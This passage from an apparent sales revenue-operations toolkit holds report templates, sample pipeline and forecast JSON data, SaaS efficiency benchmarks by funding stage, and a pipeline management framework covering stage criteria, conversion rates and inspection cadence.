### LTV:CAC Ratio
| Component | Value |
|-----------|-------|
| ARPA (Monthly) | $_ |
| ARPA (Annual) | $_ |
| Gross Margin | _% |
| Annual Churn Rate | _% |
| **Customer LTV** | **$_** |
| Customer Acquisition Cost | $_ |
| **LTV:CAC Ratio** | **_:1** |
- **Rating:** [Green / Yellow / Red]
- **Percentile:** [Top 10% / Top 25% / Median / Below Median]
- **Trend:** [Improving / Stable / Declining]
- **Interpretation:** [Are unit economics sustainable?]
### CAC Payback Period
| Component | Value |
|-----------|-------|
| CAC | $_ |
| Monthly Gross Margin Contribution | $_ |
| **CAC Payback** | **_ months** |
- **Rating:** [Green / Yellow / Red]
- **Percentile:** [Top 10% / Top 25% / Median / Below Median]
- **Trend:** [Improving / Stable / Declining]
- **Interpretation:** [How quickly are we recovering acquisition costs?]
### Burn Multiple
| Component | Value |
|-----------|-------|
| Net Burn | $_ |
| Net New ARR | $_ |
| **Burn Multiple** | **_x** |
- **Rating:** [Green / Yellow / Red]
- **Percentile:** [Top 10% / Top 25% / Median / Below Median]
- **Trend:** [Improving / Stable / Declining]
- **Interpretation:** [Is growth capital-efficient?]
### Rule of 40
| Component | Value |
|-----------|-------|
| Revenue Growth Rate | _% |
| FCF Margin | _% |
| **Rule of 40 Score** | **_%** |
- **Rating:** [Green / Yellow / Red]
- **Percentile:** [Top 10% / Top 25% / Median / Below Median]
- **Trend:** [Improving / Stable / Declining]
- **Interpretation:** [Is the growth-profitability balance healthy?]
### Net Dollar Retention
| Component | Value |
|-----------|-------|
| Beginning ARR | $_ |
| Expansion ARR | +$_ |
| Contraction ARR | -$_ |
| Churned ARR | -$_ |
| Ending ARR | $_ |
| **NDR** | **_%** |
- **Rating:** [Green / Yellow / Red]
- **Percentile:** [Top 10% / Top 25% / Median / Below Median]
- **Trend:** [Improving / Stable / Declining]
- **Interpretation:** [Are we growing revenue from the existing customer base?]
---
## Quarterly Trend
| Metric | Q-3 | Q-2 | Q-1 | Current | Direction |
|--------|-----|-----|-----|---------|-----------|
| Magic Number | _ | _ | _ | _ | |
| LTV:CAC | _:1 | _:1 | _:1 | _:1 | |
| CAC Payback | _ mo | _ mo | _ mo | _ mo | |
| Burn Multiple | _x | _x | _x | _x | |
| Rule of 40 | _% | _% | _% | _% | |
| NDR | _% | _% | _% | _% | |
---
## Benchmark Comparison
| Metric | Our Value | Stage Median | Top Quartile | Gap to Top Quartile |
|--------|-----------|-------------|--------------|---------------------|
| Magic Number | _ | _ | _ | _ |
| LTV:CAC | _:1 | _:1 | _:1 | _ |
| CAC Payback | _ mo | _ mo | _ mo | _ mo |
| Burn Multiple | _x | _x | _x | _ |
| Rule of 40 | _% | _% | _% | _% |
| NDR | _% | _% | _% | _% |
---
## Revenue Composition
### ARR Bridge
```
Beginning ARR: $____________
+ New Logo ARR: $____________
+ Expansion ARR: $____________
- Contraction ARR: $____________
- Churned ARR: $____________
= Ending ARR: $____________
Net New ARR: $____________
Growth Rate: ____________%
```
### Cost Structure
```
S&M Spend: $____________ (___% of revenue)
R&D Spend: $____________ (___% of revenue)
G&A Spend: $____________ (___% of revenue)
Total OpEx: $____________
Net Burn: $____________
Gross Margin: ____________%
```
---
## Strategic Recommendations
### Top 3 Priorities
1. **[Priority]**
- Current state: [Where we are]
- Target: [Where we need to be]
- Action plan: [How to get there]
- Expected impact: [Metric improvement]
- Timeline: [When]
2. **[Priority]**
- Current state:
- Target:
- Action plan:
- Expected impact:
- Timeline:
3. **[Priority]**
- Current state:
- Target:
- Action plan:
- Expected impact:
- Timeline:
### Investment Recommendations
| Area | Current Spend | Recommended | Rationale |
|------|--------------|-------------|-----------|
| | $_ | $_ | |
| | $_ | $_ | |
| | $_ | $_ | |
---
## Next Steps
| # | Action | Owner | Due Date | Success Metric |
|---|--------|-------|----------|---------------|
| 1 | | | | |
| 2 | | | | |
| 3 | | | | |
| 4 | | | | |
| 5 | | | | |
FILE:assets/pipeline_review_template.md
# Pipeline Review - [Date]
## Review Period
- **Review Type:** Weekly / Monthly (circle one)
- **Prepared By:** [Name]
- **Review Date:** [YYYY-MM-DD]
- **Period Covered:** [Start Date] to [End Date]
---
## Executive Summary
| Metric | Current | Last Period | Target | Status |
|--------|---------|-------------|--------|--------|
| Pipeline Coverage | _x | _x | 3-4x | |
| Total Pipeline Value | $_ | $_ | $_ | |
| Net Pipeline Change | $_ | $_ | >$0 | |
| Deals in Pipeline | _ | _ | _ | |
| Avg Deal Size | $_ | $_ | $_ | |
| Sales Velocity ($/mo) | $_ | $_ | $_ | |
**Overall Assessment:** [1-2 sentence summary of pipeline health]
---
## Coverage Analysis
### By Quarter
| Quarter | Pipeline | Target | Coverage | Status |
|---------|----------|--------|----------|--------|
| Current Quarter | $_ | $_ | _x | |
| Next Quarter | $_ | $_ | _x | |
| Q+2 | $_ | $_ | _x | |
### By Segment
| Segment | Pipeline | Target | Coverage | Notes |
|---------|----------|--------|----------|-------|
| Enterprise | $_ | $_ | _x | |
| Mid-Market | $_ | $_ | _x | |
| SMB | $_ | $_ | _x | |
---
## Stage Distribution
| Stage | # Deals | Value | % of Pipeline | Conversion Rate |
|-------|---------|-------|---------------|-----------------|
| Discovery | _ | $_ | _% | _% |
| Qualification | _ | $_ | _% | _% |
| Proposal | _ | $_ | _% | _% |
| Negotiation | _ | $_ | _% | _% |
**Funnel Health:** [Healthy / Top-heavy / Bottom-heavy / Gaps identified]
---
## Top Deals Review (S3+)
| Deal | Stage | Value | Age | Close Date | Risk | Next Step |
|------|-------|-------|-----|------------|------|-----------|
| | | $_ | _d | | | |
| | | $_ | _d | | | |
| | | $_ | _d | | | |
| | | $_ | _d | | | |
| | | $_ | _d | | | |
---
## Risk Assessment
### Concentration Risk
- **Largest deal as % of pipeline:** _%
- **Top 3 deals as % of pipeline:** _%
- **Risk Level:** [Low / Medium / High]
- **Mitigation:** [Actions to diversify]
### Aging Deals
| Deal | Stage | Age | Threshold | Days Over | Action Required |
|------|-------|-----|-----------|-----------|-----------------|
| | | _d | _d | +_d | |
| | | _d | _d | +_d | |
### Deals Pushed from Last Period
| Deal | Original Close | New Close | Times Pushed | Reason |
|------|---------------|-----------|-------------|--------|
| | | | | |
| | | | | |
---
## Pipeline Movement
### Created This Period
| Deal | Source | Value | Stage | Expected Close |
|------|--------|-------|-------|---------------|
| | | $_ | | |
| | | $_ | | |
**Total Created:** $_
### Advanced This Period
| Deal | From Stage | To Stage | Value |
|------|-----------|----------|-------|
| | | | $_ |
| | | | $_ |
### Closed Won This Period
| Deal | Value | Cycle Days | Source |
|------|-------|-----------|--------|
| | $_ | _d | |
| | $_ | _d | |
**Total Closed Won:** $_
### Closed Lost This Period
| Deal | Value | Stage Lost | Loss Reason |
|------|-------|-----------|-------------|
| | $_ | | |
| | $_ | | |
**Total Closed Lost:** $_
---
## Action Items
| # | Action | Owner | Due Date | Priority |
|---|--------|-------|----------|----------|
| 1 | | | | |
| 2 | | | | |
| 3 | | | | |
| 4 | | | | |
| 5 | | | | |
---
## Notes
[Additional context, observations, or discussion points for the review meeting]
FILE:assets/sample_forecast_data.json
{
"forecast_periods": [
{"period": "2024-Q1", "forecast": 420000, "actual": 445000},
{"period": "2024-Q2", "forecast": 480000, "actual": 460000},
{"period": "2024-Q3", "forecast": 510000, "actual": 525000},
{"period": "2024-Q4", "forecast": 550000, "actual": 510000},
{"period": "2025-Q1", "forecast": 520000, "actual": 540000},
{"period": "2025-Q2", "forecast": 580000, "actual": 560000}
],
"category_breakdowns": {
"by_rep": [
{"category": "Sarah Chen", "forecast": 210000, "actual": 225000},
{"category": "Marcus Johnson", "forecast": 185000, "actual": 160000},
{"category": "Priya Patel", "forecast": 125000, "actual": 135000},
{"category": "Alex Rivera", "forecast": 60000, "actual": 40000}
],
"by_segment": [
{"category": "Enterprise", "forecast": 320000, "actual": 310000},
{"category": "Mid-Market", "forecast": 180000, "actual": 175000},
{"category": "SMB", "forecast": 80000, "actual": 75000}
]
}
}
FILE:assets/sample_gtm_data.json
{
"revenue": {
"current_arr": 5000000,
"prior_arr": 3800000,
"net_new_arr": 1200000,
"arpa_monthly": 2500,
"revenue_growth_pct": 31.6
},
"costs": {
"sales_marketing_spend": 1800000,
"cac": 18000,
"gross_margin_pct": 78,
"total_operating_expense": 6500000,
"net_burn": 1500000,
"fcf_margin_pct": 8.4
},
"customers": {
"beginning_arr": 3800000,
"expansion_arr": 600000,
"contraction_arr": 100000,
"churned_arr": 300000,
"annual_churn_rate_pct": 8
}
}
FILE:assets/sample_pipeline_data.json
{
"quota": 500000,
"stages": ["Discovery", "Qualification", "Proposal", "Negotiation", "Closed Won"],
"average_cycle_days": 45,
"deals": [
{
"id": "D001",
"name": "Acme Corp",
"stage": "Proposal",
"value": 85000,
"age_days": 32,
"close_date": "2025-03-15",
"owner": "rep_1"
},
{
"id": "D002",
"name": "TechFlow Inc",
"stage": "Discovery",
"value": 42000,
"age_days": 8,
"close_date": "2025-04-30",
"owner": "rep_2"
},
{
"id": "D003",
"name": "GlobalData Systems",
"stage": "Negotiation",
"value": 120000,
"age_days": 55,
"close_date": "2025-02-28",
"owner": "rep_1"
},
{
"id": "D004",
"name": "Pinnacle Software",
"stage": "Qualification",
"value": 35000,
"age_days": 18,
"close_date": "2025-04-15",
"owner": "rep_3"
},
{
"id": "D005",
"name": "Meridian Health",
"stage": "Proposal",
"value": 95000,
"age_days": 40,
"close_date": "2025-03-20",
"owner": "rep_2"
},
{
"id": "D006",
"name": "CloudVault",
"stage": "Discovery",
"value": 28000,
"age_days": 5,
"close_date": "2025-05-15",
"owner": "rep_1"
},
{
"id": "D007",
"name": "Nexus Financial",
"stage": "Closed Won",
"value": 72000,
"age_days": 38,
"close_date": "2025-01-31",
"owner": "rep_3"
},
{
"id": "D008",
"name": "Urban Analytics",
"stage": "Negotiation",
"value": 58000,
"age_days": 42,
"close_date": "2025-03-05",
"owner": "rep_2"
},
{
"id": "D009",
"name": "Redwood Logistics",
"stage": "Discovery",
"value": 31000,
"age_days": 12,
"close_date": "2025-05-01",
"owner": "rep_3"
},
{
"id": "D010",
"name": "Summit Enterprises",
"stage": "Qualification",
"value": 48000,
"age_days": 22,
"close_date": "2025-04-10",
"owner": "rep_1"
},
{
"id": "D011",
"name": "Vertex Solutions",
"stage": "Proposal",
"value": 110000,
"age_days": 95,
"close_date": "2025-03-01",
"owner": "rep_2"
},
{
"id": "D012",
"name": "DataBridge AI",
"stage": "Discovery",
"value": 55000,
"age_days": 3,
"close_date": "2025-06-15",
"owner": "rep_1"
},
{
"id": "D013",
"name": "Atlas Manufacturing",
"stage": "Qualification",
"value": 67000,
"age_days": 28,
"close_date": "2025-04-20",
"owner": "rep_3"
},
{
"id": "D014",
"name": "Horizon Telecom",
"stage": "Negotiation",
"value": 250000,
"age_days": 60,
"close_date": "2025-03-10",
"owner": "rep_1"
},
{
"id": "D015",
"name": "BlueShift Labs",
"stage": "Proposal",
"value": 43000,
"age_days": 35,
"close_date": "2025-03-25",
"owner": "rep_3"
},
{
"id": "D016",
"name": "Crestview Partners",
"stage": "Discovery",
"value": 38000,
"age_days": 15,
"close_date": "2025-05-20",
"owner": "rep_2"
},
{
"id": "D017",
"name": "Ironclad Security",
"stage": "Closed Won",
"value": 91000,
"age_days": 44,
"close_date": "2025-02-10",
"owner": "rep_1"
}
]
}
FILE:references/gtm-efficiency-benchmarks.md
# GTM Efficiency Benchmarks
SaaS benchmarks by funding stage, industry standards, and strategies for improving go-to-market efficiency.
---
## Benchmarks by Funding Stage
### Seed Stage ($0-$2M ARR)
| Metric | Red | Yellow | Green | Elite |
|--------|-----|--------|-------|-------|
| Magic Number | <0.3 | 0.3-0.5 | >0.5 | >0.8 |
| LTV:CAC | <1.5:1 | 1.5-2.5:1 | >2.5:1 | >4:1 |
| CAC Payback | >30 mo | 24-30 mo | <24 mo | <15 mo |
| Burn Multiple | >5x | 3-5x | <3x | <2x |
| Rule of 40 | <0% | 0-20% | >20% | >40% |
| NDR | <90% | 90-100% | >100% | >110% |
**Context:** At seed stage, efficiency metrics are naturally less stable due to small sample sizes. Focus on directional improvement rather than absolute numbers. Burn multiple is the most critical metric -- investors want to see capital-efficient growth.
### Series A ($2M-$10M ARR)
| Metric | Red | Yellow | Green | Elite |
|--------|-----|--------|-------|-------|
| Magic Number | <0.4 | 0.4-0.6 | >0.6 | >0.9 |
| LTV:CAC | <2:1 | 2-3:1 | >3:1 | >5:1 |
| CAC Payback | >24 mo | 18-24 mo | <18 mo | <12 mo |
| Burn Multiple | >4x | 2.5-4x | <2.5x | <1.5x |
| Rule of 40 | <10% | 10-30% | >30% | >50% |
| NDR | <95% | 95-105% | >105% | >115% |
**Context:** Series A is where unit economics must prove out. LTV:CAC >3:1 validates product-market fit in the revenue model. Investors will scrutinize CAC payback to understand capital requirements.
### Series B ($10M-$50M ARR)
| Metric | Red | Yellow | Green | Elite |
|--------|-----|--------|-------|-------|
| Magic Number | <0.5 | 0.5-0.75 | >0.75 | >1.0 |
| LTV:CAC | <2.5:1 | 2.5-3.5:1 | >3.5:1 | >5:1 |
| CAC Payback | >22 mo | 15-22 mo | <15 mo | <10 mo |
| Burn Multiple | >3x | 2-3x | <2x | <1.5x |
| Rule of 40 | <20% | 20-35% | >35% | >50% |
| NDR | <100% | 100-110% | >110% | >120% |
**Context:** At Series B, the GTM machine should be scaling predictably. Magic Number >0.75 demonstrates that adding GTM spend produces proportional returns. NDR >110% proves land-and-expand motion works.
### Series C+ ($50M-$200M ARR)
| Metric | Red | Yellow | Green | Elite |
|--------|-----|--------|-------|-------|
| Magic Number | <0.5 | 0.5-0.75 | >0.75 | >1.0 |
| LTV:CAC | <3:1 | 3-4:1 | >4:1 | >6:1 |
| CAC Payback | >20 mo | 14-20 mo | <14 mo | <10 mo |
| Burn Multiple | >2.5x | 1.5-2.5x | <1.5x | <1x |
| Rule of 40 | <25% | 25-40% | >40% | >60% |
| NDR | <105% | 105-115% | >115% | >130% |
**Context:** Growth efficiency and path to profitability become paramount. The Rule of 40 is the primary board-level metric. Companies approaching IPO should target Rule of 40 >40% consistently.
### Growth / Pre-IPO ($200M+ ARR)
| Metric | Red | Yellow | Green | Elite |
|--------|-----|--------|-------|-------|
| Magic Number | <0.6 | 0.6-0.8 | >0.8 | >1.0 |
| LTV:CAC | <3:1 | 3-5:1 | >5:1 | >7:1 |
| CAC Payback | >18 mo | 12-18 mo | <12 mo | <8 mo |
| Burn Multiple | >2x | 1-2x | <1x | <0.5x |
| Rule of 40 | <30% | 30-45% | >45% | >65% |
| NDR | <110% | 110-120% | >120% | >140% |
**Context:** Pre-IPO and public companies are measured on absolute efficiency. FCF margin matters as much as growth rate. Best-in-class companies demonstrate both growth and profitability.
---
## Industry Vertical Benchmarks
### Horizontal SaaS (CRM, HR, Finance, Marketing)
| Metric | Median | Top Quartile |
|--------|--------|-------------|
| Magic Number | 0.65 | 0.90+ |
| LTV:CAC | 3.2:1 | 5.5:1+ |
| CAC Payback | 17 months | 11 months |
| Gross Margin | 72% | 80%+ |
| NDR | 108% | 120%+ |
| Win Rate | 22% | 32%+ |
### Vertical SaaS (Healthcare, FinTech, PropTech)
| Metric | Median | Top Quartile |
|--------|--------|-------------|
| Magic Number | 0.55 | 0.80+ |
| LTV:CAC | 3.8:1 | 6.0:1+ |
| CAC Payback | 15 months | 10 months |
| Gross Margin | 68% | 76%+ |
| NDR | 112% | 125%+ |
| Win Rate | 25% | 38%+ |
**Note:** Vertical SaaS often has higher NDR (deeper embedding) and higher win rates (less competition) but lower gross margins (more services).
### Infrastructure / DevTools
| Metric | Median | Top Quartile |
|--------|--------|-------------|
| Magic Number | 0.70 | 1.0+ |
| LTV:CAC | 4.0:1 | 7.0:1+ |
| CAC Payback | 14 months | 9 months |
| Gross Margin | 75% | 85%+ |
| NDR | 118% | 140%+ |
| Win Rate | 18% | 28%+ |
**Note:** Usage-based pricing in infrastructure drives exceptional NDR but more volatile revenue patterns.
### Security / Compliance
| Metric | Median | Top Quartile |
|--------|--------|-------------|
| Magic Number | 0.60 | 0.85+ |
| LTV:CAC | 3.5:1 | 5.8:1+ |
| CAC Payback | 16 months | 11 months |
| Gross Margin | 74% | 82%+ |
| NDR | 115% | 130%+ |
| Win Rate | 20% | 30%+ |
---
## Efficiency Improvement Strategies
### Improving Magic Number
**Current: <0.5 (Red) -- Target: >0.75 (Green)**
1. **Channel ROI analysis:** Audit spend by channel (paid, outbound, events, content). Cut bottom 20% performing channels and reallocate.
2. **Sales productivity:** Measure revenue per rep. Identify bottom-quartile performers for coaching or role change. Top performers should be studied and their practices systematized.
3. **Funnel efficiency:** Improve MQL-to-SQL conversion through better lead scoring. Fewer, higher-quality leads reduce wasted sales capacity.
4. **Ramp time reduction:** Accelerate new rep ramp from average 6 months to 4 months through structured onboarding, shadowing, and certification.
5. **Territory optimization:** Ensure territories are balanced by opportunity (not just geography). Over-served territories waste capacity.
### Improving LTV:CAC
**Current: <3:1 (Yellow) -- Target: >5:1 (Green)**
**Increase LTV:**
- Reduce churn through proactive health scoring and intervention
- Build expansion playbooks for cross-sell and upsell
- Increase pricing through value-based packaging
- Improve product stickiness with integrations and workflows
**Decrease CAC:**
- Invest in organic channels (content, SEO, community)
- Implement product-led growth (PLG) motion
- Optimize paid spend through better targeting and attribution
- Leverage customer referrals and case studies
### Improving CAC Payback
**Current: >18 months (Yellow) -- Target: <12 months (Green)**
1. **Increase ARPA:** Package features to drive higher initial contract values. Annual prepay discounts accelerate cash collection.
2. **Improve gross margin:** Reduce COGS through automation, self-serve onboarding, and tech-touch customer success.
3. **Reduce CAC:** Same strategies as LTV:CAC improvement on the CAC side.
4. **Contract structure:** Annual or multi-year contracts with upfront payment reduce effective payback period.
### Improving Burn Multiple
**Current: >2x (Yellow) -- Target: <1.5x (Green)**
1. **Revenue efficiency:** Focus on the highest ROI growth activities. Not all ARR is equal -- expansion ARR is typically much cheaper than new logo ARR.
2. **Operational efficiency:** Automate repeatable processes (billing, provisioning, basic support). Reduce headcount growth rate relative to revenue growth rate.
3. **Spending discipline:** Implement zero-based budgeting for non-essential spend. Every dollar of burn should connect to revenue generation.
4. **Revenue acceleration:** Sometimes the best way to improve burn multiple is not cutting costs but accelerating revenue. If you can accelerate revenue growth by 20% with 5% more spend, the burn multiple improves.
### Improving NDR
**Current: 100-110% (Yellow) -- Target: >120% (Green)**
1. **Expansion playbooks:** Define trigger events for upsell (usage thresholds, team growth, feature requests). Arm CSMs with expansion talk tracks.
2. **Usage-based pricing:** Align pricing with customer value creation. As customers use more, they pay more -- naturally drives expansion.
3. **Product-led expansion:** Build in-product prompts for upgrades. Feature gating that shows value of next tier.
4. **Reduce contraction:** Identify reasons for downgrades. Often related to poor adoption of features customers are paying for.
5. **Reduce churn:** Implement early warning system (health scores). Intervene before renewal, not at renewal.
6. **Multi-product strategy:** Cross-sell additional products to existing customers. Second product adoption reduces churn by 30-50%.
---
## Metric Relationships and Trade-offs
### Growth vs. Efficiency
The fundamental tension in SaaS is between growth rate and capital efficiency:
```
High Growth + High Burn = Blitzscaling (risky but fast)
High Growth + Low Burn = Efficient Growth (ideal)
Low Growth + Low Burn = Cash Cow (sustainable but limited)
Low Growth + High Burn = Trouble (restructure immediately)
```
**Rule of 40** captures this balance: growth rate + margin should exceed 40%.
### CAC Payback vs. Growth Rate
Shorter CAC payback enables faster reinvestment in growth. A company with 12-month payback can reinvest recovered CAC into new customer acquisition sooner than one with 24-month payback, creating a compounding advantage.
### NDR vs. New Logo Acquisition
High NDR reduces dependence on new logo acquisition for growth:
- NDR of 120% means 20% growth from existing base before any new customers
- NDR of 100% means all growth must come from new customers (expensive)
- NDR of 80% means the company is shrinking and must acquire even more new customers just to replace lost revenue
**Strategic implication:** Invest in NDR improvement before scaling new logo acquisition. Every dollar spent improving NDR has higher ROI than acquiring new customers.
---
## Benchmark Data Sources
The benchmarks in this guide are compiled from:
1. **Bessemer Cloud Index** -- Public cloud company financial data
2. **KeyBanc SaaS Survey** -- Annual survey of private SaaS companies
3. **OpenView SaaS Benchmarks** -- Product-led growth focused benchmarks
4. **Iconiq Growth Analytics** -- Private company growth and efficiency data
5. **SaaStr Annual Surveys** -- Community-sourced SaaS metrics
6. **Battery Ventures Software Report** -- Enterprise software metrics
**Note:** Benchmarks shift over time. In capital-constrained environments (higher interest rates), efficiency metrics (burn multiple, Rule of 40) receive more weight. In growth-oriented environments (lower interest rates), growth rate and market share gain importance.
---
## Quarterly Board Reporting Template
When presenting GTM efficiency to the board, organize metrics as follows:
1. **Growth:** ARR, net new ARR, growth rate, NDR
2. **Efficiency:** Magic Number, LTV:CAC, CAC Payback, Burn Multiple
3. **Balance:** Rule of 40 score and composition
4. **Pipeline:** Coverage ratio, velocity, forecast accuracy
5. **Trends:** Quarter-over-quarter change for each metric with directional indicators
6. **Benchmarks:** How the company compares to stage-appropriate benchmarks
7. **Actions:** Top 3 initiatives to improve weakest metrics
FILE:references/pipeline-management-framework.md
# Pipeline Management Framework
Best practices for pipeline management including stage definitions, conversion benchmarks, velocity optimization, and inspection cadence.
---
## Pipeline Stage Definitions
A well-defined pipeline requires clear, observable exit criteria at each stage. Subjective stages lead to inaccurate forecasting and unreliable conversion data.
### Recommended Stage Model (B2B SaaS)
| Stage | Name | Exit Criteria | Probability | Typical Duration |
|-------|------|--------------|-------------|-----------------|
| S0 | Lead | Contact identified, initial interest signal | 5% | 0-7 days |
| S1 | Discovery | Pain identified, budget confirmed, stakeholder engaged | 10% | 7-14 days |
| S2 | Qualification | MEDDPICC criteria met, mutual action plan created | 20% | 14-21 days |
| S3 | Proposal | Solution presented, pricing delivered, champion confirmed | 40% | 7-14 days |
| S4 | Negotiation | Commercial terms discussed, legal engaged, verbal commitment | 60% | 7-21 days |
| S5 | Commit | Contract redlined, signature timeline confirmed | 80% | 3-7 days |
| S6 | Closed Won | Signed contract received | 100% | -- |
| SL | Closed Lost | Deal disposition recorded with loss reason | 0% | -- |
### Stage Exit Criteria Best Practices
**Discovery (S1) Exit Criteria:**
- Pain point articulated by prospect (not assumed by rep)
- Budget range discussed (even if informal)
- Decision-making process understood
- Next meeting scheduled with clear agenda
**Qualification (S2) Exit Criteria:**
- MEDDPICC or BANT qualification framework completed
- Economic buyer identified (not just champion)
- Compelling event or timeline identified
- Mutual action plan (MAP) shared and agreed upon
- Technical requirements understood
**Proposal (S3) Exit Criteria:**
- Solution demo completed and well-received
- Pricing proposal delivered
- Champion validated proposal internally
- Competitive landscape understood
- No unresolved technical blockers
**Negotiation (S4) Exit Criteria:**
- Commercial terms discussed (not just pricing, but payment terms, SLA, etc.)
- Legal review initiated
- Security/procurement review started
- Verbal agreement on core terms
- Close date confirmed within 30 days
**Commit (S5) Exit Criteria:**
- Final contract sent for signature
- All legal redlines resolved
- Procurement approval obtained
- Signature expected within 7 business days
---
## Conversion Benchmarks by Segment
### SMB (ACV <$25K)
| Transition | Benchmark | Top Quartile |
|-----------|-----------|--------------|
| Lead to Discovery | 20-30% | 35%+ |
| Discovery to Qualification | 40-50% | 55%+ |
| Qualification to Proposal | 50-60% | 65%+ |
| Proposal to Negotiation | 55-65% | 70%+ |
| Negotiation to Close | 65-75% | 80%+ |
| Overall Win Rate | 20-30% | 35%+ |
| Avg Cycle Length | 14-30 days | <14 days |
### Mid-Market (ACV $25K-$100K)
| Transition | Benchmark | Top Quartile |
|-----------|-----------|--------------|
| Lead to Discovery | 15-25% | 30%+ |
| Discovery to Qualification | 35-45% | 50%+ |
| Qualification to Proposal | 45-55% | 60%+ |
| Proposal to Negotiation | 50-60% | 65%+ |
| Negotiation to Close | 60-70% | 75%+ |
| Overall Win Rate | 15-25% | 30%+ |
| Avg Cycle Length | 30-60 days | <30 days |
### Enterprise (ACV >$100K)
| Transition | Benchmark | Top Quartile |
|-----------|-----------|--------------|
| Lead to Discovery | 10-20% | 25%+ |
| Discovery to Qualification | 30-40% | 45%+ |
| Qualification to Proposal | 40-50% | 55%+ |
| Proposal to Negotiation | 45-55% | 60%+ |
| Negotiation to Close | 55-65% | 70%+ |
| Overall Win Rate | 10-20% | 25%+ |
| Avg Cycle Length | 60-120 days | <60 days |
---
## Sales Velocity Optimization
Sales velocity = (# Opportunities x Avg Deal Size x Win Rate) / Avg Cycle Days
Each component is an optimization lever:
### Lever 1: Increase Opportunity Volume
**Strategies:**
- Invest in inbound marketing (content, SEO, paid)
- Scale outbound SDR capacity
- Develop partner/channel sourcing
- Launch product-led growth (PLG) motion
- Implement customer referral programs
**Measurement:** Pipeline created ($) per week/month, by source
### Lever 2: Increase Average Deal Size
**Strategies:**
- Multi-product bundling and packaging
- Usage-based pricing with growth triggers
- Land-and-expand with defined expansion playbooks
- Move upmarket with enterprise features
- Value-based pricing tied to customer outcomes
**Measurement:** ACV trend by quarter, by segment
### Lever 3: Increase Win Rate
**Strategies:**
- Implement MEDDPICC qualification rigor
- Build competitive battle cards and train on them
- Create multi-threaded relationships (not single-threaded)
- Develop ROI/business case tools
- Invest in sales engineering and demo quality
- Win/loss analysis with structured debriefs
**Measurement:** Win rate by stage entry, by competitor, by rep
### Lever 4: Decrease Sales Cycle Length
**Strategies:**
- Pre-qualify harder at S1/S2 to remove slow deals
- Mutual action plans with milestone dates
- Champion enablement (arm champions with internal selling materials)
- Parallel processing (legal/security review concurrent with evaluation)
- Standardized contracts and pre-approved terms
- Executive sponsor engagement for stuck deals
**Measurement:** Days in each stage, cycle length trend, stage-specific bottlenecks
---
## Pipeline Inspection Cadence
### Daily (Rep Level)
**Focus:** Deal-level activity and next steps
**Questions:**
- What is the next step for each deal in S3+?
- Are any deals missing next steps or scheduled meetings?
- Which deals have not been updated in >3 days?
### Weekly (Manager/Team Level)
**Focus:** Pipeline health and forecast accuracy
**Review Format (45-60 minutes):**
1. **Coverage Check (10 min)**
- Current pipeline vs. quota -- is coverage >3x?
- Pipeline created this week vs. target
- Net pipeline change (created minus closed minus lost)
2. **Deal Inspection (25 min)**
- Walk top 10 deals by value in S3+
- MEDDPICC validation for each commit deal
- Identify deals at risk (aging, single-threaded, no next step)
3. **Forecast Call (10 min)**
- Commit, best case, and pipeline forecast
- Changes from last week's forecast (what moved and why)
- Gaps to plan and remediation
4. **Action Items (5 min)**
- Deals needing executive engagement
- Pipeline generation actions for next week
- Coaching priorities
### Monthly (Leadership Level)
**Focus:** Pipeline trends, velocity, and efficiency
**Review Areas:**
- Month-over-month pipeline growth trend
- Conversion rate trends by stage
- Sales velocity trend (improving or declining?)
- Forecast accuracy (MAPE) for the month
- Rep performance distribution (quartile analysis)
- Pipeline source mix health
### Quarterly (Executive/Board Level)
**Focus:** GTM efficiency and strategic pipeline
**Review Areas:**
- Pipeline coverage for next 2-3 quarters
- LTV:CAC and Magic Number trends
- Sales efficiency ratio trends
- Market segment performance comparison
- New market/product pipeline contribution
- Competitive win/loss trends
---
## Pipeline Hygiene
### Deal Hygiene Standards
1. **Close date accuracy:** Close dates must be based on buyer commitment, not rep hope. Any deal pushed more than twice should be flagged for re-qualification.
2. **Stage accuracy:** Deals must meet exit criteria to be in a stage. No deal should be in Proposal (S3) without a pricing deliverable sent.
3. **Amount accuracy:** Deal amounts must reflect the current proposal, not aspirational upsell. Variance between deal value and proposal should be <10%.
4. **Contact coverage:** Deals >$50K should have 3+ contacts associated. Enterprise deals should have economic buyer, champion, and technical evaluator.
5. **Activity recency:** No deal should go 7+ days without logged activity. Deals without recent activity signal stalling.
### Pipeline Cleanup Triggers
Run cleanup when:
- Pipeline-to-quota ratio drops below 2.5x
- Forecast accuracy (MAPE) exceeds 20%
- More than 15% of pipeline is >90 days old
- Average deal age exceeds 1.5x normal cycle time
### Cleanup Process
1. Flag all deals with close date in the past
2. Flag all deals with no activity in 14+ days
3. Flag all deals pushed 3+ times
4. Rep self-assessment: keep, push, or close for each flagged deal
5. Manager review and disposition
6. Update CRM and recalculate metrics
---
## Pipeline Risk Indicators
### Concentration Risk
**Definition:** Over-reliance on a small number of large deals.
**Thresholds:**
- Single deal >40% of pipeline = HIGH risk
- Single deal >25% of pipeline = MEDIUM risk
- Top 3 deals >70% of pipeline = HIGH risk
**Mitigation:** Diversify pipeline across segments, deal sizes, and sources. Increase deal count even if average deal size decreases.
### Stage Imbalance Risk
**Definition:** Pipeline is concentrated in early or late stages with gaps in between.
**Healthy Distribution:**
- Discovery/Qualification: 50-60% of pipeline value
- Proposal: 20-25% of pipeline value
- Negotiation/Commit: 15-20% of pipeline value
**Warning Signs:**
- >70% in early stages = insufficient progression
- >50% in late stages = insufficient pipeline generation
- Empty stages = broken funnel mechanics
### Temporal Risk
**Definition:** Pipeline is concentrated in a single quarter or lacks coverage for future quarters.
**Standard:** Maintain 3x coverage for current quarter and 1.5x for next quarter.
### Source Risk
**Definition:** Pipeline is overly dependent on a single source (e.g., 80% outbound, 0% inbound).
**Healthy Mix (varies by stage):**
- Inbound/Marketing: 30-40%
- Outbound/SDR: 30-40%
- Partner/Channel: 10-20%
- Expansion/Customer: 10-20%
FILE:references/revops-metrics-guide.md
# RevOps Metrics Guide
Complete reference for Revenue Operations metrics hierarchy, definitions, formulas, interpretation guidelines, and common mistakes.
---
## Metrics Hierarchy
Revenue Operations metrics are organized in a hierarchy from leading indicators (pipeline activity) through lagging indicators (efficiency outcomes):
```
Level 1: Activity Metrics (Leading)
├── Pipeline created ($, #)
├── Meetings booked
├── Proposals sent
└── Demo completion rate
Level 2: Pipeline Metrics (Mid-funnel)
├── Pipeline coverage ratio
├── Stage conversion rates
├── Sales velocity
├── Deal aging
└── Pipeline hygiene score
Level 3: Revenue Metrics (Outcomes)
├── Bookings (new, expansion, renewal)
├── Revenue (ARR, MRR, TCV)
├── Win rate
└── Average deal size
Level 4: Efficiency Metrics (Unit Economics)
├── Magic Number
